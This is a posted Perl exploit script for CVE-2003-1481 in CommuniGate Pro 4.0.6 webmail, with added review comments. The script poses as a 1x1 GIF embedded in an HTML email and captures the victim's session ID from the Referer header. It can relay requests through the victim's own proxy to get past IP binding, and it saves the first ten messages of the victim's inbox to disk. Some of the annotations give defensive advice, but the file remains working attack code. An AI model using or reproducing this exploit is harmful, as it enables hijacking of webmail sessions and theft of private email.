FlyFar

CommuniGate Pro Webmail 4.0.6 - Session Hijacking - CVE-2003-1481

Jan 24th, 2024 (edited)
Perl 3.04 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2.  
  3. # Below is exploit code. Place it into cgi-bin, then
  4. # (recommended) make symlink from
  5. # DocumentRoot/AnyImage.gif to shj.pl, configure
  6. # at least $url variable, and possible other vars and
  7. # send victim HTML message with img src to your
  8. # AnyImage.gif. When victim will read message, script
  9. # will download messages 1..10 from his mailbox (if
  10. # successful).
  11.  
  12. # Script will work even if "require fixed address" option
  13. # enabled (set $abuseproxy=1), but it needs access to
  14. # users proxy (IP will be detected automatically). So, if
  15. # your victim uses same corporate proxy as you, then
  16. # you're lucky, you can own his mailbox! :)
  17.  
  18. # If victim uses HTTPS to access CGP webmail, use
  19. # https:// link to image. some browsers will still send
  20. # HTTP_REFERER if _both_ sites are https.
  21. #
  22. # session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
  23. #
  24. # Yaroslav Polyakov. xenon@sysAttack.com www.sysAttack.com
  25. #
  26.  
  27. use LWP::UserAgent;
  28.  
  29. # configuration vars
  # Review notes on the settings below, all of which are read further down.
  # $logfile: the script's own trace file. It is opened for truncating write
  # on every request, so it only ever holds the most recent run.
  30. $logfile="/tmp/log";
  # $url: template of the webmail message-view URL. %SID% and %N% are
  # placeholders filled in by the fetch loop. The session id is part of the
  # URL path, which is what lets it appear in a Referer header sent to another
  # host (the issue tracked as CVE-2003-1481 per the page title).
  31. $url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N%";
  # $SIDREGEXP: pattern applied to the Referer. The capture group is the
  # session token (letters, digits and '-') that follows "Session/".
  32. $SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
  # Inclusive range of message numbers requested by the fetch loop.
  33. $msglonum=1;
  34. $msghinum=10;
  # Path prefix for saved responses; the message number is appended to it.
  35. $msgprefix="/tmp/hijacked-";
  # When $abuseproxy is true, requests are relayed through an HTTP proxy at the
  # address of the client that loaded the image, on $proxyport. The header
  # comment ties this to the server's "require fixed address" option: binding a
  # session to a source IP cannot tell apart two users who reach the server
  # through the same proxy, so it is not sufficient as the only session check.
  36. $abuseproxy=1;
  37. $proxyport=3128;
  38.  
  # printgif: writes a complete CGI response to the default output handle: a
  # "Content-Type: image/gif" header, the blank line that ends the headers,
  # then the bytes held in $gif1x1. The byte string starts with "GIF89a" and
  # declares a width and a height of 1, i.e. a single-pixel image.
  # Takes no arguments; the caller ignores the return value.
  # Because a valid image comes back, the mail reader that requested it shows
  # nothing unusual. Not loading remote images in HTML mail avoids the request
  # (and the Referer it carries) altogether.
  # NOTE(review): $gif1x1 is assigned without "my", so it is a package global.
  39. sub printgif
  40. {
  41. $gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc0
  42. \x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00
  43. \x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
  # NOTE(review): as pasted, the literal above is wrapped over three lines, so
  # the line breaks sit inside the string. Presumably a line-wrap artifact of
  # the listing rather than intended bytes -- confirm against the original.
  44.  
  45.  
  46.   print "Content-Type: image/gif\n";
  47.   print "\n";
  48.   print "$gif1x1";
  49. }
  50.  
  51.  
  # Opens the trace log, then answers the HTTP request with the image before
  # any of the Referer checks that follow. The image is therefore returned
  # whether or not a session id is found.
  # NOTE(review): "||" binds more tightly than the list operator open, so it
  # applies to the string "> $logfile" (always true) and the die() can never
  # run; a failed open goes unnoticed. This is also a two-argument open on a
  # bareword handle, writing to a fixed, predictable path under /tmp.
  52. open LOG, "> $logfile" || die("cant write to my log");
  53. printgif;
  54.  
  55.  
  56.  
  # REMOTE_ADDR and HTTP_REFERER are the CGI environment variables holding the
  # requesting client's address and the Referer header of the image request.
  # Both are written to the log.
  57. $remote=$ENV{'REMOTE_ADDR'};
  58. $referer=$ENV{'HTTP_REFERER'};
  59. print LOG "remote: $remote\nreferer: $referer\n";
  60. # if($referer=~/SID=([0-9a-zA-Z\-]+)/){
  # NOTE(review): the commented-out line above looks like an alternative
  # pattern for a token carried as a SID= parameter -- TODO confirm.
  # Everything after this point depends on the match below: the Referer must
  # contain the webmail URL with the session token in its path. If it does
  # not, the script logs that and exits without contacting the mail server.
  # For a defender this is the control point: keep the session token out of
  # URLs (for example in a cookie), send no Referer to other origins (e.g. a
  # Referrer-Policy of no-referrer), or block remote content in messages. Each
  # of these leaves this branch with nothing to capture.
  61. if($referer=~/$SIDREGEXP/){
  62.                 $SID=$1;
  63.                 print LOG "SID: $SID\n";
  64.                 }else{
  65.                                 print LOG "sorry, cant
  66. find out SID\n";
  67.                                 exit;
  68.                 }
  69.  
  70.  
  71.  
  72. # create request
  # Builds the HTTP client used for the fetches. "new LWP::UserAgent" is
  # indirect-object syntax for LWP::UserAgent->new.
  73. my $ua = new LWP::UserAgent;
  # The User-Agent set here is a fixed, distinctive string. If it is left
  # unchanged it is a value to search for in webmail and proxy access logs.
  74. $ua->agent("shj - sysAttack CGP session HiJack/1.0");
  75.  
  # With $abuseproxy set, 'http' requests are sent via a proxy at $remote (the
  # address that requested the image) on $proxyport, so the mail server sees
  # them arrive from that proxy. Only the 'http' scheme is configured here.
  # Requiring authentication on the proxy, and not relying on source-IP
  # binding as the only session check, both address this path.
  76. if($abuseproxy){
  77.                 print LOG "set proxy
  78. http://$remote:$proxyport/\n";
  79.                 $ua->proxy('http',
  80. "http://$remote:$proxyport/");
  81. }
  82.  
  # Requests message numbers $msglonum..$msghinum (inclusive) using the
  # captured session id and saves each response body to its own file.
  # In the mail server's access log this shows up as a run of sequential
  # Message.wssp?Mailbox=INBOX&MSG=<n> requests on one session id, carrying the
  # User-Agent configured earlier in the script unless that has been changed.
  83. for($index=$msglonum;$index<=$msghinum;$index++){
  # Fill the two placeholders in a fresh copy of the template. Without /g only
  # the first occurrence of each is replaced (the template has one of each).
  84.                $eurl=$url;
  85.                 $eurl =~ s/%N%/$index/;
  86.                 $eurl =~ s/%SID%/$SID/;
  87.                 print LOG "fetching $eurl\n";
  88.                 $request = new HTTP::Request("GET", $eurl);
  89.                 $response = $ua->request($request);
  # NOTE(review): LWP::UserAgent normally returns a response object even for
  # failed requests, so the else branch is presumably never taken -- confirm.
  # The status line is logged but not checked, so the body is written to disk
  # for error responses as well.
  90.                 if($response){
  91.                                 print LOG
  92. $response->code." ".$response->message
  93. ."\n";
  # NOTE(review): two-argument open on a bareword handle. The die() message is
  # single-quoted, so $msgprefix$index would be printed literally. The line
  # breaks inside the two literals look like wrap artifacts of the listing.
  94.                                 open MSG, ">
  95. $msgprefix$index" or die('cant crea
  96. te $msgprefix$index');
  97.                                 print MSG
  98. $response->content;
  99.                                 close MSG;
  100.                 }else{
  101.                                 print LOG "undefined
  102. response\n";
  103.                 }
  104. }
  105. close LOG;
  106.  
  107.  
  108.  
  109. # milw0rm.com [2003-05-05]
  110.            